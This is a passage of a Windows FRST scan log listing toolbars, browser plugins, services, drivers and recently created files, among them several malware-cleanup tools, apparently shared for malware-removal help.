Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Reader 3\npnitromozilla.dll (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-01-12]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR Profile: C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-06-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Google Wallet) - C:\Users\My Computer\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-12]
CHR HKLM-x32\...\Chrome\Extension: [fplhdcjmbpfkejbhngmlngaecbjmoimd] - C:\Program Files\AVAST Software\Avast\AdBlocker\Chrome\avast-adblocker-chrome.crx []
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-07-21]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S2 appdrvrem01; C:\Windows\System32\appdrvrem01.exe [551896 2012-03-12] (Protection Technology)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-07-21] (AVAST Software)
R2 GFNEXSrv; C:\Windows\System32\GFNEXSrv.exe [162824 2010-09-09] ()
R2 NitroReaderDriverReadSpool3; C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe [230416 2013-06-18] (Nitro PDF Software)
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132504 2013-10-20] (Symantec Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 appdrv01; C:\Windows\System32\Drivers\appdrv01.sys [3854000 2012-03-12] (Protection Technology)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-07-21] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-07-21] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-07-21] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-07-21] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-07-21] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-07-21] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-07-21] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-07-21] ()
S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-15] (support.com, Inc)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-10 23:14 - 2014-11-10 23:14 - 04163057 _____ () C:\Users\My Computer\Downloads\tdsskiller.zip
2014-11-10 23:13 - 2014-11-10 23:13 - 00434171 _____ () C:\Users\My Computer\Desktop\utility.htm
2014-11-10 19:52 - 2014-11-10 19:52 - 00000911 _____ () C:\Users\My Computer\Desktop\JRT.txt
2014-11-10 19:46 - 2014-11-10 19:46 - 00000000 ____D () C:\windows\ERUNT
2014-11-10 19:44 - 2014-11-10 19:44 - 01706808 _____ (Thisisu) C:\Users\My Computer\Desktop\JRT.exe
2014-11-10 19:41 - 2014-11-10 19:42 - 00008837 _____ () C:\Users\My Computer\Desktop\AdwCleaner[S0].txt
2014-11-10 19:36 - 2014-11-10 19:39 - 00000000 ____D () C:\AdwCleaner
2014-11-10 19:36 - 2014-11-10 19:36 - 02140160 _____ () C:\Users\My Computer\Downloads\AdwCleaner.exe
2014-11-10 19:35 - 2014-11-10 19:35 - 00017862 _____ () C:\Users\My Computer\Desktop\download (1).htm
2014-11-10 19:31 - 2014-11-10 19:31 - 00299130 _____ () C:\Users\My Computer\Desktop\ESETPoweliksCleaner.exe_20141110.193116.4816.log
2014-11-10 19:26 - 2014-11-10 19:26 - 00186568 _____ (ESET) C:\Users\My Computer\Desktop\ESETPoweliksCleaner.exe
2014-11-10 18:56 - 2014-11-10 18:56 - 00002355 _____ () C:\Users\My Computer\Desktop\aswMBR.txt
2014-11-10 18:56 - 2014-11-10 18:56 - 00000512 _____ () C:\Users\My Computer\Desktop\MBR.dat
2014-11-10 18:34 - 2014-11-10 18:34 - 00027532 _____ () C:\Users\My Computer\Desktop\Addition.txt
2014-11-10 18:33 - 2014-11-11 07:52 - 00018409 _____ () C:\Users\My Computer\Desktop\FRST.txt
2014-11-10 18:32 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Desktop\aswMBR.exe
2014-11-10 18:32 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Desktop\FRST64.exe
2014-11-10 18:06 - 2014-11-10 18:06 - 05194752 _____ (AVAST Software) C:\Users\My Computer\Downloads\aswMBR.exe
2014-11-10 18:02 - 2014-11-10 18:14 - 00028065 _____ () C:\Users\My Computer\Downloads\Addition.txt
2014-11-10 18:00 - 2014-11-11 07:52 - 00000000 ____D () C:\FRST
2014-11-10 18:00 - 2014-11-10 18:29 - 00017669 _____ () C:\Users\My Computer\Downloads\FRST.txt
2014-11-10 17:58 - 2014-11-10 17:58 - 02116096 _____ (Farbar) C:\Users\My Computer\Downloads\FRST64.exe
2014-11-10 17:57 - 2014-11-10 17:57 - 00017782 _____ () C:\Users\My Computer\Desktop\download.htm
2014-11-10 17:55 - 2014-11-10 17:55 - 00000207 _____ () C:\windows\tweaking.com-regbackup-MYCOMPUTER-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-11-10 17:52 - 2014-11-10 17:52 - 00000000 ____D () C:\RegBackup
2014-11-10 17:51 - 2014-11-10 17:51 - 00325960 _____ () C:\Users\My Computer\Desktop\lua5.1.dll
2014-11-10 17:51 - 2014-11-10 17:51 - 00001567 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\Uninstall
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\files
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\Users\My Computer\Desktop\color_presets
2014-11-10 17:51 - 2014-11-10 17:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-11-10 17:50 - 2014-11-10 17:50 - 04215584 _____ () C:\Users\My Computer\Downloads\tweaking.com_registry_backup_setup.exe
2014-11-10 17:46 - 2014-11-10 17:49 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (3)
2014-11-09 23:33 - 2014-11-09 23:39 - 122307832 _____ (Microsoft Corporation) C:\Users\My Computer\Downloads\msert.exe
2014-11-09 03:24 - 2009-06-10 16:00 - 00000824 _____ () C:\windows\system32\Drivers\etc\hosts.20141109-032450.backup
2014-11-09 02:10 - 2014-11-09 02:10 - 00068328 _____ () C:\Users\My Computer\AppData\Local\GDIPFONTCACHEV1.DAT
2014-11-09 02:07 - 2014-11-10 23:10 - 00002732 _____ () C:\windows\PFRO.log
2014-11-09 02:07 - 2014-11-09 02:08 - 00303648 _____ () C:\windows\system32\FNTCACHE.DAT
2014-11-09 00:42 - 2014-11-11 01:32 - 00000560 _____ () C:\windows\setupact.log
2014-11-09 00:42 - 2014-11-09 00:42 - 00000000 _____ () C:\windows\setuperr.log
2014-11-08 20:26 - 2014-11-10 18:18 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-06 20:50 - 2014-11-06 20:50 - 00001362 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00001350 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-11-06 20:50 - 2014-11-06 20:50 - 00000656 _____ () C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000628 _____ () C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000458 _____ () C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2014-11-06 20:50 - 2014-11-06 20:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-11-06 20:49 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\windows\system32\sdnclean64.exe
2014-11-06 20:46 - 2014-11-06 20:49 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\My Computer\Downloads\spybot-2.4.exe
2014-11-04 23:10 - 2014-11-04 23:10 - 00000460 _____ () C:\Users\My Computer\Documents\cc_20141104_231029.reg
2014-11-04 17:22 - 2014-11-11 07:50 - 00224083 _____ () C:\windows\WindowsUpdate.log
2014-11-03 19:24 - 2014-11-03 19:24 - 00188487 _____ () C:\Users\My Computer\Downloads\Rustbelt_Middle_Values_Only_10.23.14.xlsx
2014-10-28 18:00 - 2014-11-10 23:15 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\My Computer\Desktop\TDSSKiller.exe
2014-10-22 11:49 - 2014-10-22 11:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (4).xls
2014-10-22 11:38 - 2014-10-22 11:38 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (3).xls
2014-10-22 11:31 - 2014-10-22 11:31 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (2).xls
2014-10-22 11:30 - 2014-10-22 11:30 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (2).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (4).xls
2014-10-22 11:03 - 2014-10-22 11:03 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (3).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3 (1).xls
2014-10-22 11:02 - 2014-10-22 11:02 - 00065536 _____ () C:\Users\My Computer\Downloads\UP3477WS11.xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (2).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6 (1).xls
2014-10-22 11:01 - 2014-10-22 11:01 - 00061952 _____ () C:\Users\My Computer\Downloads\UP3477WS8.xls
2014-10-22 11:00 - 2014-10-22 11:00 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5 (1).xls
2014-10-22 10:58 - 2014-10-22 10:58 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (2).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2 (1).xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00070144 _____ () C:\Users\My Computer\Downloads\UP3477WS9.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00066048 _____ () C:\Users\My Computer\Downloads\UP3477WS3.xls
2014-10-22 10:57 - 2014-10-22 10:57 - 00024576 _____ () C:\Users\My Computer\Downloads\UP3477WS7.xls
2014-10-22 10:55 - 2014-10-22 10:55 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim (1).exe
2014-10-22 10:54 - 2014-10-22 10:54 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2.xls
2014-10-22 10:51 - 2014-10-22 10:51 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim.exe
2014-10-22 10:51 - 2014-10-22 10:51 - 00000000 ____D () C:\windows\SysWOW64\Adobe
2014-10-22 10:49 - 2014-10-22 10:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5.xls
2014-10-22 10:48 - 2014-10-22 10:48 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6.xls
2014-10-18 15:29 - 2014-10-18 15:29 - 00011206 _____ () C:\Users\My Computer\Documents\cc_20141018_162905.reg
2014-10-15 06:15 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-15 06:15 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-15 06:15 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-15 06:15 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 06:15 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 06:15 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 06:15 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 06:15 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 06:15 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-15 06:15 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 06:15 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-15 06:15 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-15 06:15 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-15 06:15 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 06:15 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 06:15 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 06:15 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 06:15 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 06:15 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-15 06:15 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 06:15 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 06:15 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 06:15 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-15 06:15 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2014-10-15 06:14 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls
2014-10-15 06:13 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls
2014-10-15 06:13 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-15 06:04 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-15 06:04 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-15 06:04 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-15 06:04 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-15 06:04 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-15 06:04 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-15 06:04 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-15 06:04 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-14 20:26 - 2014-10-14 20:27 - 00937005 _____ () C:\Users\My Computer\Downloads\Attachments_20141014 (1).zip
2014-10-14 20:24 - 2014-10-14 20:24 - 03465946 _____ () C:\Users\My Computer\Downloads\Attachments_20141014.zip
2014-10-12 07:47 - 2014-10-12 07:48 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00001990 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00000000 ____D () C:\Program Files (x86)\Adobe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-11 07:50 - 2014-01-23 16:02 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-11-11 07:50 - 2013-09-24 08:33 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
